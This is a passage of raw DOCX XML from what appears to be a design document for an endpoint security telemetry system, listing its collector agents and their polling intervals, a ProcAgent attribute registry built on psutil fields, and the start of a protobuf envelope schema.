            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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A08BA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Interval</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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D8862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Platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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5F602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Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="0902404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5C701" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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ProcAgent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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0371F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8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F7E3A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10s</w:t>
            </w:r>
          </w:p>
        </w:tc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A2202" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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macOS+Linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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75D48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PROC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="12168AD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7D588" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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AuthGuardAgent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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7A620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8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D017A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10s</w:t>
            </w:r>
          </w:p>
        </w:tc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E75B8" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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macOS+Linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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6E9DD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AUTH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="218B3AA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945DB" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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PersistenceGuard</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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99DAC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8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2DBC0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60s</w:t>
            </w:r>
          </w:p>
        </w:tc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52FC9" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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macOS+Linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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72676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PERSIST</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="23E6265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71FCA" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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FIMAgent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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B8EE1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9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5295F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300s</w:t>
            </w:r>
          </w:p>
        </w:tc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12756" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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macOS+Linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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ED174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FIM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="2929B35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A5B62" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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DNSAgent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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08EC6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9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22967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10s</w:t>
            </w:r>
          </w:p>
        </w:tc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B4EB3" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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macOS+Linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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713A6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DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="0CBD3A7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25AB0" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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KernelAuditAgent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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DE75C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3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16A98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5s</w:t>
            </w:r>
          </w:p>
        </w:tc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32F91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Linux only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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4D286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KERNEL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="03275D6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8D4A0" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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FlowAgent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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1DF76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8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66379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10s</w:t>
            </w:r>
          </w:p>
        </w:tc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2D5E1" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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macOS+Linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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3CB34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FLOW</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="2406E6A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6E989" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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PeripheralAgent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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9F5F1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7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CE41F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30s</w:t>
            </w:r>
          </w:p>
        </w:tc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858FC" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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macOS+Linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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A8400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PERIPH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="21FB119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AF7F9" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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DeviceDiscovery</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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7CF7F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6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FEBEA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300s</w:t>
            </w:r>
          </w:p>
        </w:tc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A535E" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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macOS+Linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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CF68B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DISC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="37DE47DD" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00501EAB">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6577AEBE" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>2.3 Complete Attribute Registry (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ProcAgent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Sample)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders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  <w:insideH w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
          <w:insideV w:val="single" w:sz="6" w:space="1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1"/>
        <w:gridCol w:w="2298"/>
        <w:gridCol w:w="3908"/>
        <w:gridCol w:w="1753"/>
      </w:tblGrid>
      <w:tr w:rsidR="00501EAB" w14:paraId="13A0031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1B2A4A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79779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Agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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ADEBC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Attribute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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FD413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Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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7A776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Classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="3D6B214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2EC5B" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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ProcAgent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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253F3" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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pid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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B528B" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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psutil.process_iter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>()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A59FE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RAW</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="2FB8AA1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900AE" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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ProcAgent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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BE328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name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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66E78" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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psutil.process_iter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>()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8AB83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RAW</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="1CEF342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2049A" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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ProcAgent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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77663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exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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5AA21" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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psutil.process_iter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>()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C78B3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RAW</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="7941766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0C72A" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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ProcAgent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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5478F" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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cmdline</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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726B9" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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psutil.process_iter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>()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53EA8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RAW</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="493ABB8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7BF7B" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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ProcAgent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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9B3C4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username</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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23721" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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psutil.process_iter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>()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9A70F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RAW</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="6E79717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8CBAF" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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ProcAgent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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AE7C5" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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ppid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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A3952" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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psutil.process_iter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>()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5E6F1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RAW</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="35885D7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28167" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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lastRenderedPageBreak/>
              <w:t>ProcAgent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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B1579" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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parent_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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3A09F" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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psutil.Process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>(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ppid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>).name()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5A930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DERIVED</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="7A1E713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6A5ED" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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ProcAgent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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84D11" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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process_guid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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14218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SHA256(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device_id:pid:create_time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>)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1600C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DERIVED</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="3E42E24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A4868" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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ProcAgent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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8C088" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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cpu_percent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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EF9E5" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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psutil.process_iter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>()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5B3E4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RAW</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="6F40202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0B82F" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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ProcAgent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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6B87D" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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memory_percent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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0964F" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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psutil.process_iter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>()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33B21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RAW</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="28E9109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E56BB" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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ProcAgent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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20040" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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suspicious_patterns</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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0798F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 xml:space="preserve">Regex match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LOLBin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dict</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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4226A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SYNTHETIC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="6C4AE19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DCFF7" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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ProcAgent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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FF42C" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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risk_score</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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713B9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Confidence × severity weight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C94F3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SYNTHETIC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="7DDA2AD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DBB0C" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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ProcAgent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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D76A0" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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mitre_techniques</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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CCBF8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Hardcoded per probe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99587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SYNTHETIC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35AB63C9" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00501EAB">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B1FE778" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Protobuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Schema: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UniversalEnvelope</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="61FFAB14" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UniversalEnvelope</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2852F8DB" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  string version = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1221B431" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  uint64 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ts_ns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320A6BFB" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  string </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>idempotency_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DD4E27" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>oneof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> payload {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490C236E" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FlowEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> flow = 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B81710" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ProcessEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> process = 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E59B46D" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DeviceTelemetry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>device_telemetry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126B9DEE" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45966F41" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  bytes sig = 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3736E881" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  bytes </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>prev_sig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5082792D" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  string </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>signing_algorithm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386F84CC" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  string priority = 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29464A98" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  map&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>string,string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>processing_hints</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A883D0" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  repeated string tags = 12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D566D4" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  string </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>source_agent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = 13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD6A98E" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
